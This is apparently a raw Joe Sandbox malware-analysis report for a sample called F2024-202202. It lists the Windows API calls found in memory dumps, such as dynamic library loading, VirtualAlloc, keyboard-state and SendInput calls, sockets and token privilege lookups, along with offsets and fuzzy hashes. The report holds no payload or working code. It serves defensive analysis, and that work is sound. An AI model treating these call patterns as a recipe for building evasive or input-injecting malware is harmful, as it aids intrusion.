              • LoadLibraryA.KERNEL32(advapi32.dll,?,002012C1), ref: 00201080
              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00201092
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 2574300362-4033151799
              • Opcode ID: b24a07f97130081d106846d87064114e5353ef761063a2e0347a8c3d96af6804
              • Instruction ID: be00a5461f64a809edce33e29ae61d499ba6c21cf61de3ee67359d419daf3f17
              • Opcode Fuzzy Hash: b24a07f97130081d106846d87064114e5353ef761063a2e0347a8c3d96af6804
              • Instruction Fuzzy Hash: B6D01770960713CFD7309F35E918A1BB6E5AF1A361F118D3AACCADA591E770C8E0CA50
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,001F9009,?,0020F910), ref: 001F9403
              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001F9415
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetModuleHandleExW$kernel32.dll
              • API String ID: 2574300362-199464113
              • Opcode ID: 9c351044e67f083896d9a6906ece69f444b9283a4fdeca19029eec2d1265b38b
              • Instruction ID: 11e7d8fe64d50e5ea51f14decf1c73ba8e7b95df366be6455fee591eb927a3c3
              • Opcode Fuzzy Hash: 9c351044e67f083896d9a6906ece69f444b9283a4fdeca19029eec2d1265b38b
              • Instruction Fuzzy Hash: B5D01274654717CFD7319F31DB0C616B6D5BF15351B11C83A9585D6951D770C4C0CA50
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LocalTime__swprintf
              • String ID: %.3d$WIN_XPe
              • API String ID: 2070861257-2409531811
              • Opcode ID: 0a6e8a7b32e529432b4831225431f7fd782f69730d38d753fa476b3593628d42
              • Instruction ID: 599c77f4adc69f522525db3d16b6d9b266e5955e712bb4338a54ba89fd2c7948
              • Opcode Fuzzy Hash: 0a6e8a7b32e529432b4831225431f7fd782f69730d38d753fa476b3593628d42
              • Instruction Fuzzy Hash: 7BD012B5884118FACB5CAA909D45FF9737CA726701F110596B90291401F334DF949F21
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f3c3c418aa46916e2717be1ebba884a6dd1c3cb08bb2bb6cd6f756c8fdc51239
              • Instruction ID: 43e9eea6a87790f4d62a2e4bef1dab9fee62544079ad1d6cada5ef4317205d11
              • Opcode Fuzzy Hash: f3c3c418aa46916e2717be1ebba884a6dd1c3cb08bb2bb6cd6f756c8fdc51239
              • Instruction Fuzzy Hash: AAC19075A04216EFCB14CF94C898EAEB7B5FF48314B15859AE805EB391E730DD81CB90
              APIs
              • CharLowerBuffW.USER32(?,?), ref: 001FE3D2
              • CharLowerBuffW.USER32(?,?), ref: 001FE415
                • Part of subcall function 001FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 001FDAD9
              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 001FE615
              • _memmove.LIBCMT ref: 001FE628
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharLower$AllocVirtual_memmove
              • String ID:
              • API String ID: 3659485706-0
              • Opcode ID: 1e9e32abcab154ec24287bfd88720fd05ef3031d5575116bcad2b82c31e345fb
              • Instruction ID: 3d901bf43e80dfff4e9e57bc7b5e6fccb3113f35a27f60e2945ad8c4cebc4b5f
              • Opcode Fuzzy Hash: 1e9e32abcab154ec24287bfd88720fd05ef3031d5575116bcad2b82c31e345fb
              • Instruction Fuzzy Hash: 82C157756083058FC714DF28C48096ABBE4FF99718F14896EF9999B361D730EA46CF82
              APIs
              • CoInitialize.OLE32(00000000), ref: 001F83D8
              • CoUninitialize.OLE32 ref: 001F83E3
                • Part of subcall function 001DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001DDAC5
              • VariantInit.OLEAUT32(?), ref: 001F83EE
              • VariantClear.OLEAUT32(?), ref: 001F86BF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
              • String ID:
              • API String ID: 780911581-0
              • Opcode ID: 038274687edc275a6ea577332314bb1e12c4bce23ff699cc1df6c7177dba7cbe
              • Instruction ID: 4748fd738532ff91ebfed5496a4dc7c34fa8b63841b40518e44c094b779191c6
              • Opcode Fuzzy Hash: 038274687edc275a6ea577332314bb1e12c4bce23ff699cc1df6c7177dba7cbe
              • Instruction Fuzzy Hash: 99A14B756047059FDB14EF14C885B2AB7E4BF98324F18444DFA9A9B3A2CB30ED05CB42
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$AllocClearCopyInitString
              • String ID:
              • API String ID: 2808897238-0
              • Opcode ID: 40f93289a5f900837ef6825c1aadea9c4c32f4b1008d63d2fb568396b355e25f
              • Instruction ID: 7f7f38018963a0836a4391d280975bd6140494c05f6cdb1da6c1309e096952d5
              • Opcode Fuzzy Hash: 40f93289a5f900837ef6825c1aadea9c4c32f4b1008d63d2fb568396b355e25f
              • Instruction Fuzzy Hash: D051D8346087019FDB34AF69E895A3EB3E5AF59310F24881FF996CB3D1EB7098409B51
              APIs
              • GetWindowRect.USER32(0142FB10,?), ref: 00209AD2
              • ScreenToClient.USER32(00000002,00000002), ref: 00209B05
              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00209B72
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ClientMoveRectScreen
              • String ID:
              • API String ID: 3880355969-0
              • Opcode ID: 516f41c5aa7b148611e952c62e2947a02ba48913261231e036234a300ba98309
              • Instruction ID: 0d0d872d4f3cd353b98c4a880fa1a5409f691a57575d1d3682d526b67992b248
              • Opcode Fuzzy Hash: 516f41c5aa7b148611e952c62e2947a02ba48913261231e036234a300ba98309
              • Instruction Fuzzy Hash: 66513F34A10309EFCF20DF58E9849AE7BB9FB55324F148159F8169B2D2D730AD91CB50
              APIs
              • socket.WSOCK32(00000002,00000002,00000011), ref: 001F6CE4
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6CF4
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001F6D58
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6D64
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorLast$__itow__swprintfsocket
              • String ID:
              • API String ID: 2214342067-0
              • Opcode ID: 68a4195c67bcd0fde04a2d0565e40f9848611967adfde6a99be57007f3e09124
              • Instruction ID: 764cd70cd2b1317f4a948a3ec8c505b1be26c22feb208fdfc0fe0ffe9256f8f1
              • Opcode Fuzzy Hash: 68a4195c67bcd0fde04a2d0565e40f9848611967adfde6a99be57007f3e09124
              • Instruction Fuzzy Hash: C941B075740200AFEB20BF64DC86F3A77E5AB14B14F488058FA599B2D3DB719E008B91
              APIs
              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0020F910), ref: 001F67BA
              • _strlen.LIBCMT ref: 001F67EC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _strlen
              • String ID:
              • API String ID: 4218353326-0
              • Opcode ID: 577375d70d73e9525263fc947ffbe666cfdd266b1cbdc73f1a338cbe923e9b97
              • Instruction ID: b3945854ffc47f6c3d561d70643832d0f977169310b37b63c3a0e63a2fa7a275
              • Opcode Fuzzy Hash: 577375d70d73e9525263fc947ffbe666cfdd266b1cbdc73f1a338cbe923e9b97
              • Instruction Fuzzy Hash: 1641C775A00208AFCB14FB64DCD5FBEB3A9EF58354F148169F91597292DB30AE00CB50
              APIs
              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001EBB09
              • GetLastError.KERNEL32(?,00000000), ref: 001EBB2F
              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001EBB54
              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001EBB80
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateHardLink$DeleteErrorFileLast
              • String ID:
              • API String ID: 3321077145-0
              • Opcode ID: 06e12899a892cad666f61f6ec98f86002dc04e3fbaee4a528ba701444a379d9d
              • Instruction ID: 796667d65ab87d689bfb2bbd2dece9400aa27d427738c0c3a8003a41bb84ffbb
              • Opcode Fuzzy Hash: 06e12899a892cad666f61f6ec98f86002dc04e3fbaee4a528ba701444a379d9d
              • Instruction Fuzzy Hash: D6412939600A51DFCB20EF15C584A6DBBE1EF99314B198498EC4A9B762CB34FD01CF91
              APIs
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00208B4D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InvalidateRect
              • String ID:
              • API String ID: 634782764-0
              • Opcode ID: 6c9c4cd68bc801621c4dbca09f2fdb93ebdbab0ed18449d0f49595be4b18bd56
              • Instruction ID: 7eafe9ad47963b3eda4fde17874da7825960ec6a2afafa67898a62887661d8b5
              • Opcode Fuzzy Hash: 6c9c4cd68bc801621c4dbca09f2fdb93ebdbab0ed18449d0f49595be4b18bd56
              • Instruction Fuzzy Hash: 6631D474660305BFEB309E18DC49FAB3BA4EB06318F644512FAD1D66E3DF70A9608B51
              APIs
              • ClientToScreen.USER32(?,?), ref: 0020AE1A
              • GetWindowRect.USER32(?,?), ref: 0020AE90
              • PtInRect.USER32(?,?,0020C304), ref: 0020AEA0
              • MessageBeep.USER32(00000000), ref: 0020AF11
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Rect$BeepClientMessageScreenWindow
              • String ID:
              • API String ID: 1352109105-0
              • Opcode ID: 51a3c35a0cecc8635eaf3d65b58c95c04ee0476f37dd009a78fc39424f8aa03e
              • Instruction ID: 2e57d803eb9b59339a616e2ed58e6aa3b4a59fb66cbebd6fb072f2765cbcb29e
              • Opcode Fuzzy Hash: 51a3c35a0cecc8635eaf3d65b58c95c04ee0476f37dd009a78fc39424f8aa03e
              • Instruction Fuzzy Hash: A3418E7461031ADFCB11CF58D888BA97BF5FB4A340FA881B9E8149B292D731A851CF52
              APIs
              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 001E1037
              • SetKeyboardState.USER32(00000080,?,00000001), ref: 001E1053
              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001E10B9
              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001E110B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: eb8570ad13c223e62b4f9dd535aca406a9ab7dd7c5151604df372d5572302d38
              • Instruction ID: f271c17d2e3b2b1dfac02ddc3bd26b65f9e9c229bdce403e1857d06671b3364b
              • Opcode Fuzzy Hash: eb8570ad13c223e62b4f9dd535aca406a9ab7dd7c5151604df372d5572302d38
              • Instruction Fuzzy Hash: 8B313530E44EC8BEFB358B678C09BFEBBA9AB49320F08431AF591521D1C37589C49751
              APIs
              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 001E1176
              • SetKeyboardState.USER32(00000080,?,00008000), ref: 001E1192
              • PostMessageW.USER32(00000000,00000101,00000000), ref: 001E11F1
              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 001E1243
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: 51b17713a02969e0f3ca1bb08c1b65a679c83086ba65c33f9b23ab4f4430a558
              • Instruction ID: 4742e4baf43658e0d24e2b4644f231e3bf0f1208b1f626b4ce81ba87773e127b
              • Opcode Fuzzy Hash: 51b17713a02969e0f3ca1bb08c1b65a679c83086ba65c33f9b23ab4f4430a558
              • Instruction Fuzzy Hash: 96312830A40B887AEF358B778C087FE7BBAAB59310F14431AF691925D1C37489959751
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001B644B
              • __isleadbyte_l.LIBCMT ref: 001B6479
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001B64A7
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001B64DD
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 60d11c0a9a9c4034f303d70982ccd6a79476e0afaa86c26833a6cb9eb6858d61
              • Instruction ID: 60cde71a97867e160fae45ca524db758c53e8e78d967df51ea5afb5ba02240a4
              • Opcode Fuzzy Hash: 60d11c0a9a9c4034f303d70982ccd6a79476e0afaa86c26833a6cb9eb6858d61
              • Instruction Fuzzy Hash: 0131EF31600646EFDB258F64CC88BFA7BA5FF61310F154429F868871A1EB39D850DB90
              APIs
              • GetForegroundWindow.USER32 ref: 00205189
                • Part of subcall function 001E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001E3897
                • Part of subcall function 001E387D: GetCurrentThreadId.KERNEL32 ref: 001E389E
                • Part of subcall function 001E387D: AttachThreadInput.USER32(00000000,?,001E52A7), ref: 001E38A5
              • GetCaretPos.USER32(?), ref: 0020519A
              • ClientToScreen.USER32(00000000,?), ref: 002051D5
              • GetForegroundWindow.USER32 ref: 002051DB
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
              • String ID:
              • API String ID: 2759813231-0
              • Opcode ID: 44d86ab2a6b6e17e3e632e91394aefa39f64b9781be4a604c7c7e8b9a1348136
              • Instruction ID: 9c610b7d81efa23dfc4905369350362ac1b3b2b4912b8f55be5947e039ee5d81
              • Opcode Fuzzy Hash: 44d86ab2a6b6e17e3e632e91394aefa39f64b9781be4a604c7c7e8b9a1348136
              • Instruction Fuzzy Hash: 2A312C71900218AFDB14EFA5C985AEFB7F9EF98300F14406AE416E7241EB759E05CFA0
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • GetCursorPos.USER32(?), ref: 0020C7C2
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001BBBFB,?,?,?,?,?), ref: 0020C7D7
              • GetCursorPos.USER32(?), ref: 0020C824
              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001BBBFB,?,?,?), ref: 0020C85E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Cursor$LongMenuPopupProcTrackWindow
              • String ID:
              • API String ID: 2864067406-0
              • Opcode ID: 3a42d11366ce8205a0df6250544c40899d57a5f335016a9682d543e22ffb58f0
              • Instruction ID: 9c33a20f3ed61109ce3694ab1fd7d0e49ce0621916642065a4ef1ceadd3755df
              • Opcode Fuzzy Hash: 3a42d11366ce8205a0df6250544c40899d57a5f335016a9682d543e22ffb58f0
              • Instruction Fuzzy Hash: 2B31F875510218AFCB26CF58DC9CEEA7BB9EF0A310F144165F9058B2A2D7315D60DF64
              APIs
                • Part of subcall function 001D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001D8669
                • Part of subcall function 001D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001D8673
                • Part of subcall function 001D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8682
                • Part of subcall function 001D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8689
                • Part of subcall function 001D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D869F
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001D8BEB
              • _memcmp.LIBCMT ref: 001D8C0E
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001D8C44
              • HeapFree.KERNEL32(00000000), ref: 001D8C4B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
              • String ID:
              • API String ID: 1592001646-0
              • Opcode ID: 87f4dac28c3455d34f6da9f8840f2bfd6cd2a3ff9a4de9228fa097aacb556f11
              • Instruction ID: e1c3093b674b25d1b05551b55934a5b4fab139b40559c0ef6eb307b1a69a07d2
